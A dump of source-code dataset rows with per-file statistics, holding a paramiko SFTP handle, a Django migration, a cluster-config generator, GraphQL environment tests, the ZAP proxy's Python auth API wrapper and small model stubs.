| 54.462121 | 75 | 0.335791 | 1,034 | 7,189 | 2.327853 | 0.281431 | 0.054009 | 0.05484 | 0.07312 | 0.176568 | 0 | 0 | 0 | 0 | 0 | 0 | 0.422303 | 0.461121 | 7,189 | 131 | 76 | 54.877863 | 0.199019 | 0.136876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178899 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
59c07712f78b8701ce24892262492a52ef344906 | 278 | py | Python | src/sftp/sftp_handle.py | IntercraftMC/intercraft-sftp | 6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f | [
"MIT"
] | null | null | null | src/sftp/sftp_handle.py | IntercraftMC/intercraft-sftp | 6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f | [
"MIT"
] | 2 | 2019-03-05T14:07:36.000Z | 2019-03-08T02:00:37.000Z | src/sftp/sftp_handle.py | IntercraftMC/intercraft-sftp | 6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f | [
"MIT"
] | null | null | null | import os
import paramiko
class SftpHandle(paramiko.SFTPHandle):
def stat(self):
try:
return paramiko.SFTPAttributes.from_stat(os.fstat(self.readfile.fileno()))
except OSError as e:
return paramiko.SFTPServer.convert_errno(e.errno)
def chattr(self, attr):
pass
| 19.857143 | 77 | 0.758993 | 38 | 278 | 5.5 | 0.657895 | 0.133971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136691 | 278 | 13 | 78 | 21.384615 | 0.870833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.1 | 0.2 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
59cb4b5a7e4e4de46f30f0ecb9a11b2447b40fad | 884 | py | Python | web/core/migrations/0089_auto_20201118_1234.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | 4 | 2020-03-22T18:13:12.000Z | 2021-01-25T10:33:31.000Z | web/core/migrations/0089_auto_20201118_1234.py | MTES-MCT/carbure | 2876756b760ab4866fa783bb40e61a046eebb1ab | [
"MIT"
] | 20 | 2020-07-06T14:33:14.000Z | 2022-03-15T16:54:17.000Z | web/core/migrations/0089_auto_20201118_1234.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | 4 | 2020-04-03T12:19:12.000Z | 2021-06-15T12:20:57.000Z | # Generated by Django 3.0.7 on 2020-11-18 11:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0088_matierepremiere_is_huile_vegetale'),
]
operations = [
migrations.AddField(
model_name='depot',
name='address',
field=models.CharField(default='', max_length=128),
preserve_default=False,
),
migrations.AddField(
model_name='depot',
name='ownership_type',
field=models.CharField(choices=[('OWN', 'Propre'), ('THIRD_PARTY', 'Tiers')], default='THIRD_PARTY', max_length=32),
),
migrations.AddField(
model_name='depot',
name='postal_code',
field=models.CharField(default='', max_length=32),
preserve_default=False,
),
]
| 28.516129 | 128 | 0.578054 | 88 | 884 | 5.625 | 0.568182 | 0.109091 | 0.139394 | 0.163636 | 0.363636 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0.041534 | 0.291855 | 884 | 30 | 129 | 29.466667 | 0.749201 | 0.050905 | 0 | 0.458333 | 1 | 0 | 0.149343 | 0.0454 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ab72dffbafe60c111d8d185e2a4e9e3c45bff202 | 3,763 | py | Python | utils/clustergen.py | lanhin/TripletRun | 06f73a6911fae2f9874bed8f9d68bf0d3fd5e973 | [
"MIT"
] | 15 | 2019-03-22T16:07:53.000Z | 2021-07-31T03:22:34.000Z | utils/clustergen.py | lanhin/TripletRun | 06f73a6911fae2f9874bed8f9d68bf0d3fd5e973 | [
"MIT"
] | null | null | null | utils/clustergen.py | lanhin/TripletRun | 06f73a6911fae2f9874bed8f9d68bf0d3fd5e973 | [
"MIT"
] | 2 | 2018-05-23T08:30:39.000Z | 2020-08-28T11:13:40.000Z | #/usr/bin/env python
'''
@2018-01 by lanhin
Generate cluster json file.
Usage: python2 clustergen.py
The output file name is cluster.json
'''
import getopt
import sys
import os
def jsonout(fileout, devices, edges, nodelinks):
with open(fileout, "wb") as result:
outItem = "{\n \"devices\":\n [\n"
result.write(outItem)
# Write devices
for i in range(len(devices)-1):
outItem = "\t{\"id\":\""+(str)(devices[i][0])+"\",\n\t\"compute\":\""+(str)(devices[i][1])+"\",\n\t\"RAM\":\""+(str)(devices[i][2])+"\",\n\t\"bw\":\""+(str)(devices[i][3])+"\",\n\t\"loc\":\""+str(devices[i][4])+"\"\n\t},\n"
result.write(outItem)
outItem = "\t{\"id\":\""+(str)(devices[-1][0])+"\",\n\t\"compute\":\""+(str)(devices[-1][1])+"\",\n\t\"RAM\":\""+(str)(devices[-1][2])+"\",\n\t\"bw\":\""+(str)(devices[-1][3])+"\",\n\t\"loc\":\""+str(devices[-1][4])+"\"\n\t}\n"
result.write(outItem)
outItem = " ],\n \"links\":\n [\n"
result.write(outItem)
# Write links
for i in range(len(edges)-1):
outItem = "\t{\"src\":\""+(str)(edges[i][0])+"\",\n\t\"dst\":\""+(str)(edges[i][1])+"\",\n\t\"bw\":\""+(str)(edges[i][2])+"\"\n\t},\n"
result.write(outItem)
outItem = "\t{\"src\":\""+(str)(edges[-1][0])+"\",\n\t\"dst\":\""+(str)(edges[-1][1])+"\",\n\t\"bw\":\""+(str)(edges[-1][2])+"\"\n\t}"
result.write(outItem)
if len(nodelinks) > 0:
outItem = ",\n"
else:
outItem = "\n"
result.write(outItem)
for i in range(len(nodelinks)-1):
outItem = "\t{\"src\":\""+(str)(nodelinks[i][0])+"\",\n\t\"dst\":\""+(str)(nodelinks[i][1])+"\",\n\t\"bw\":\""+(str)(nodelinks[i][2])+"\",\n\t\"BetweenNode\":\"true\"\n\t},\n"
result.write(outItem)
outItem = "\t{\"src\":\""+(str)(nodelinks[-1][0])+"\",\n\t\"dst\":\""+(str)(nodelinks[-1][1])+"\",\n\t\"bw\":\""+(str)(nodelinks[-1][2])+"\",\n\t\"BetweenNode\":\"true\"\n\t}\n"
result.write(outItem)
outItem = " ]\n}\n"
result.write(outItem)
# compute, RAM, bw, network
devs = [("1000000", "1048576", "1111490", "1600000"),
("10000000", "1048576", "1342177", "3200000"),
("100000000", "2097152", "1342177", "3200000")]
# id, output network bandwidth in KB/s
comnodes = [(0,1000000), (1,20000000), (2,1000000), (3,1000000),
(4,1000000), (5,1000000), (6,1000000), (7,1000000)]
# id, compute, RAM, bw, location, network bandwidth
devices = list()
edges = list()
nodelinks = list()
if (len(sys.argv)) != 2:
print "Usage: python clustergen.py <cluster input file>"
exit(1)
filein = sys.argv[1]
fileout = filein + '.json'
print "Input:",filein
print "Output:",fileout
if os.path.isfile(fileout):
os.remove(fileout)
with open(filein, "rb") as source:
for line in source: # id, index, location
splited = line.strip().split(' ')
devices.append((int(splited[0]), devs[int(splited[1])][0], devs[int(splited[1])][1], devs[int(splited[1])][2], splited[2], devs[int(splited[1])][3]))
for i in range(len(devices)):
if int(devices[i][4]) == int(splited[-1]) and devices[i][0] != int(splited[0]): # in the same node
bw = min(float(devices[i][-1]), float(devs[int(splited[1])][-1]))
edges.append((splited[0], devices[i][0], str(bw)))
for i in range(len(comnodes)):
for j in range(i+1, len(comnodes)):
if j >= len(comnodes):
continue
nodelinks.append((comnodes[i][0], comnodes[j][0], min(float(comnodes[i][1]), float(comnodes[j][1]))))
#print devices
#print edges
#print nodelinks
jsonout(fileout, devices, edges, nodelinks)
| 37.63 | 235 | 0.526707 | 524 | 3,763 | 3.782443 | 0.204198 | 0.024218 | 0.090817 | 0.086276 | 0.415237 | 0.279011 | 0.098385 | 0.098385 | 0.067608 | 0.067608 | 0 | 0.073476 | 0.193463 | 3,763 | 99 | 236 | 38.010101 | 0.579572 | 0.062184 | 0 | 0.16129 | 1 | 0 | 0.273263 | 0.121025 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.048387 | null | null | 0.048387 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
abbc16642f88ae7f1504bc4fde9ba1c81bcb930e | 19,773 | py | Python | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | gigabackup/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 60 | 2018-09-26T15:46:00.000Z | 2021-10-10T02:37:14.000Z | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | gigabackup/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 1,706 | 2018-09-26T16:11:22.000Z | 2021-08-20T13:37:59.000Z | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | griffinmilsap/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 11 | 2019-03-14T13:23:51.000Z | 2022-01-25T01:29:16.000Z | import pytest
import graphene
from gtmcore.inventory.inventory import InventoryManager
from gtmcore.fixtures import ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV
from gtmcore.environment import ComponentManager
from gtmcore.environment.bundledapp import BundledAppManager
import gtmcore
from lmsrvlabbook.tests.fixtures import fixture_working_dir_env_repo_scoped, fixture_working_dir
class TestEnvironmentServiceQueries(object):
def test_get_environment_status(self, fixture_working_dir, snapshot):
"""Test getting the a LabBook's environment status"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook10", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook10") {
environment {
containerStatus
imageStatus
}
}
}
"""
snapshot.assert_match(fixture_working_dir[2].execute(query))
def test_get_base(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test getting the a LabBook's base"""
# Create labbook
query = """
mutation myCreateLabbook($name: String!, $desc: String!, $repository: String!,
$base_id: String!, $revision: Int!) {
createLabbook(input: {name: $name, description: $desc,
repository: $repository,
baseId: $base_id, revision: $revision}) {
labbook {
id
name
description
}
}
}
"""
variables = {"name": "labbook-base-test", "desc": "my test 1",
"base_id": ENV_UNIT_TEST_BASE, "repository": ENV_UNIT_TEST_REPO,
"revision": ENV_UNIT_TEST_REV}
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query, variable_values=variables))
query = """
{
labbook(owner: "default", name: "labbook-base-test") {
name
description
environment {
base{
id
componentId
name
description
readme
tags
icon
osClass
osRelease
license
url
languages
developmentTools
dockerImageServer
dockerImageNamespace
dockerImageRepository
dockerImageTag
packageManagers
}
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_get_package_manager(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test getting the a LabBook's package manager dependencies"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook4", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook4") {
environment {
packageDependencies {
edges {
node {
id
manager
package
version
fromBase
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
# should be null
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
# Add a base image
cm = ComponentManager(lb)
pkgs = [{"manager": "pip", "package": "requests", "version": "1.3"},
{"manager": "pip", "package": "numpy", "version": "1.12"},
{"manager": "pip", "package": "gtmunit1", "version": "0.2.4"}]
cm.add_packages('pip', pkgs)
pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"},
{"manager": "conda3", "package": "nltk", "version": '3.2.5'}]
cm.add_packages('conda3', pkgs)
# Add one package without a version, which should cause an error in the API since version is required
pkgs = [{"manager": "apt", "package": "lxml", "version": "3.4"}]
cm.add_packages('apt', pkgs)
query = """
{
labbook(owner: "default", name: "labbook4") {
environment {
packageDependencies {
edges {
node {
id
manager
package
version
fromBase
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r1
snapshot.assert_match(r1)
query = """
{
labbook(owner: "default", name: "labbook4") {
environment {
packageDependencies(first: 2, after: "MA==") {
edges {
node {
id
manager
package
version
fromBase
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r1
snapshot.assert_match(r1)
def test_get_package_manager_metadata(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test getting the a LabBook's package manager dependencies"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook4meta", description="my first asdf")
query = """
{
labbook(owner: "default", name: "labbook4meta") {
environment {
packageDependencies {
edges {
node {
id
manager
package
version
fromBase
description
docsUrl
latestVersion
}
cursor
}
pageInfo {
hasNextPage
}
}
}
}
}
"""
# should be null
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
# Add a base image
cm = ComponentManager(lb)
pkgs = [{"manager": "pip", "package": "gtmunit3", "version": "5.0"},
{"manager": "pip", "package": "gtmunit2", "version": "12.2"},
{"manager": "pip", "package": "gtmunit1", "version": '0.2.1'}]
cm.add_packages('pip', pkgs)
pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"},
{"manager": "conda3", "package": "python-coveralls", "version": "2.5.0"}]
cm.add_packages('conda3', pkgs)
r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r1
snapshot.assert_match(r1)
def test_package_query_with_errors(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook5", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook5"){
id
checkPackages(packageInput: [
{manager: "pip", package: "gtmunit1", version:"0.2.4"},
{manager: "pip", package: "gtmunit2", version:"100.00"},
{manager: "pip", package: "gtmunit3", version:""},
{manager: "pip", package: "asdfasdfasdf", version:""}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query_with_errors_conda(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook5conda", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook5conda"){
id
checkPackages(packageInput: [
{manager: "conda3", package: "cdutil", version:"8.1"},
{manager: "conda3", package: "nltk", version:"100.00"},
{manager: "conda3", package: "python-coveralls", version:""},
{manager: "conda3", package: "thisshouldtotallyfail", version:"1.0"},
{manager: "conda3", package: "notarealpackage", version:""}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query_with_errors_apt(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
# Create labbook
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook5apt", description="my first labbook10000")
# Create Component Manager
cm = ComponentManager(lb)
# Add a component
cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV)
query = """
{
labbook(owner: "default", name: "labbook5apt"){
id
checkPackages(packageInput: [
{manager: "apt", package: "curl", version:"8.1"},
{manager: "apt", package: "notarealpackage", version:""}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook6", description="my first labbook10000")
query = """
{
labbook(owner: "default", name: "labbook6"){
id
checkPackages(packageInput: [
{manager: "pip", package: "gtmunit1", version:"0.2.4"},
{manager: "pip", package: "gtmunit2", version:""}]){
id
manager
package
version
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_package_query_no_version(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for package info"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook6noversion", description="my first labbook10000")
# Create Component Manager
cm = ComponentManager(lb)
cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV)
query = """
{
labbook(owner: "default", name: "labbook6noversion"){
id
checkPackages(packageInput: [
{manager: "pip", package: "gtmunit1"},
{manager: "pip", package: "notarealpackage"}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
query = """
{
labbook(owner: "default", name: "labbook6noversion"){
id
checkPackages(packageInput: [
{manager: "apt", package: "curl"},
{manager: "apt", package: "notarealpackage"}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
query = """
{
labbook(owner: "default", name: "labbook6noversion"){
id
checkPackages(packageInput: [
{manager: "conda3", package: "nltk"},
{manager: "conda3", package: "notarealpackage"}]){
id
manager
package
version
latestVersion
description
isValid
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_bundle_app_query(self, snapshot, fixture_working_dir_env_repo_scoped):
"""Test querying for bundled app info"""
im = InventoryManager()
lb = im.create_labbook("default", "default", "labbook-bundle", description="my first df")
query = """
{
labbook(owner: "default", name: "labbook-bundle"){
id
environment {
bundledApps{
id
appName
description
port
command
}
}
}
}
"""
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
bam = BundledAppManager(lb)
bam.add_bundled_app(8050, 'dash 1', 'a demo dash app 1', 'python app1.py')
bam.add_bundled_app(9000, 'dash 2', 'a demo dash app 2', 'python app2.py')
bam.add_bundled_app(9001, 'dash 3', 'a demo dash app 3', 'python app3.py')
snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
def test_base_update_available(self, fixture_working_dir_env_repo_scoped, snapshot):
"""Test checking if the base is able to be updated"""
im = InventoryManager()
lb = im.create_labbook('default', 'default', 'labbook-base-test-update')
cm = ComponentManager(lb)
# Add an old base.
cm.add_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 1)
query = """
{
labbook(owner: "default", name: "labbook-base-test-update") {
name
description
environment {
base{
id
revision
}
baseLatestRevision
}
}
}
"""
r = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r
assert r['data']['labbook']['environment']['base']['revision'] == 1
assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
# We upgrade our base to the latest
cm.change_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 2)
r = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r
assert r['data']['labbook']['environment']['base']['revision'] == 2
assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
query = """
{
labbook(owner: "default", name: "labbook-base-test-update") {
name
environment {
baseLatestRevision
}
}
}
"""
r = fixture_working_dir_env_repo_scoped[2].execute(query)
assert 'errors' not in r
assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
| 39.546 | 111 | 0.427603 | 1,438 | 19,773 | 5.683588 | 0.140473 | 0.056528 | 0.068641 | 0.073412 | 0.761899 | 0.724826 | 0.69387 | 0.662058 | 0.638444 | 0.564786 | 0 | 0.018524 | 0.483993 | 19,773 | 499 | 112 | 39.625251 | 0.782515 | 0.040813 | 0 | 0.543529 | 0 | 0 | 0.657899 | 0.027944 | 0 | 0 | 0 | 0 | 0.065882 | 1 | 0.025882 | false | 0 | 0.018824 | 0 | 0.047059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
abc3eecfb1dec304561dc28f93ae2435fd288309 | 379 | py | Python | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | from typing import List
class StatisticGenerator(object):
def __init__(self, column_names):
self.column_names = column_names
'''
Function which returns two arrays:
1. Statistic column names
2. Statistic column values for each column name
'''
def generate_statistic(self, data_set) -> (List[str], List[str]):
pass | 27.071429 | 69 | 0.643799 | 45 | 379 | 5.222222 | 0.644444 | 0.187234 | 0.12766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007273 | 0.274406 | 379 | 14 | 70 | 27.071429 | 0.847273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.166667 | 0.166667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
abc616e2534ce71688707838c39b33ab9fe3a9aa | 869 | py | Python | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
from yepes.apps import apps
AbstractCountry = apps.get_class('standards.abstract_models', 'AbstractCountry')
AbstractCountrySubdivision = apps.get_class('standards.abstract_models', 'AbstractCountrySubdivision')
AbstractCurrency = apps.get_class('standards.abstract_models', 'AbstractCurrency')
AbstractGeographicArea = apps.get_class('standards.abstract_models', 'AbstractGeographicArea')
AbstractLanguage = apps.get_class('standards.abstract_models', 'AbstractLanguage')
AbstractRegion = apps.get_class('standards.abstract_models', 'AbstractRegion')
class Country(AbstractCountry):
pass
class CountrySubdivision(AbstractCountrySubdivision):
pass
class Currency(AbstractCurrency):
pass
class GeographicArea(AbstractGeographicArea):
pass
class Language(AbstractLanguage):
pass
class Region(AbstractRegion):
pass
| 28.032258 | 102 | 0.802071 | 80 | 869 | 8.5625 | 0.3125 | 0.061314 | 0.105109 | 0.183942 | 0.306569 | 0.306569 | 0 | 0 | 0 | 0 | 0 | 0.001274 | 0.096663 | 869 | 30 | 103 | 28.966667 | 0.871338 | 0.023015 | 0 | 0.315789 | 0 | 0 | 0.306147 | 0.234043 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.315789 | 0.052632 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
abcf74d3543dcbf2c7fa1eff397453f8e4095e08 | 3,044 | py | Python | python/api/src/zapv2/auth.py | psiinon/zaproxy-release | 5462b14fb337a2d4f68595a207aa3367ec71a671 | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2017-07-26T18:03:44.000Z | 2017-07-26T18:03:44.000Z | python/api/src/zapv2/auth.py | gcxtx/zappy | 3d215327addd6f2ea4ca7091a42c330c67fc30ef | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2016-02-25T10:06:53.000Z | 2016-03-29T07:49:34.000Z | python/api/src/zapv2/auth.py | gcxtx/zappy | 3d215327addd6f2ea4ca7091a42c330c67fc30ef | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2021-08-17T05:48:59.000Z | 2021-08-17T05:48:59.000Z | # Zed Attack Proxy (ZAP) and its related class files.
#
# ZAP is an HTTP/HTTPS proxy for assessing web application security.
#
# Copyright 2013 ZAP development team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This file was automatically generated.
"""
class auth(object):
def __init__(self, zap):
self.zap = zap
def login_url(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loginUrl/', {'contextId' : contextid})
def login_data(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loginData/', {'contextId' : contextid})
def logged_in_indicator(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loggedInIndicator/', {'contextId' : contextid})
def logout_url(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/logoutUrl/', {'contextId' : contextid})
def logout_data(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/logoutData/', {'contextId' : contextid})
def logged_out_indicator(self, contextid):
return self.zap._request(self.zap.base + 'auth/view/loggedOutIndicator/', {'contextId' : contextid})
def login(self, contextid):
return self.zap._request(self.zap.base + 'auth/action/login/', {'contextId' : contextid})
def logout(self, contextid):
return self.zap._request(self.zap.base + 'auth/action/logout/', {'contextId' : contextid})
@property
def auto_reauth_on(self):
return self.zap._request(self.zap.base + 'auth/action/autoReauthOn/').get('autoReauthOn')
@property
def auto_reauth_off(self):
return self.zap._request(self.zap.base + 'auth/action/autoReauthOff/').get('autoReauthOff')
def set_login_url(self, contextid, url, postdata=''):
return self.zap._request(self.zap.base + 'auth/action/setLoginUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata})
def set_login_indicator(self, contextid, indicator):
return self.zap._request(self.zap.base + 'auth/action/setLoginIndicator/', {'contextId' : contextid, 'indicator' : indicator})
def set_logout_url(self, contextid, url, postdata=''):
return self.zap._request(self.zap.base + 'auth/action/setLogoutUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata})
def set_logged_out_indicator(self, contextid, indicator):
return self.zap._request(self.zap.base + 'auth/action/setLoggedOutIndicator/', {'contextId' : contextid, 'indicator' : indicator})
| 42.277778 | 140 | 0.703022 | 389 | 3,044 | 5.401028 | 0.298201 | 0.099952 | 0.086625 | 0.13327 | 0.443598 | 0.435031 | 0.435031 | 0.435031 | 0.391242 | 0.391242 | 0 | 0.003145 | 0.164258 | 3,044 | 71 | 141 | 42.873239 | 0.82272 | 0.23456 | 0 | 0.060606 | 0 | 0 | 0.221788 | 0.105035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0 | 0.424242 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
abd7ebb6a3efed0c59a0bf6d4b58df0c2f293555 | 307 | py | Python | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | null | null | null | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | 7 | 2021-08-23T20:52:07.000Z | 2022-03-12T00:48:51.000Z | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | null | null | null | from torch import nn
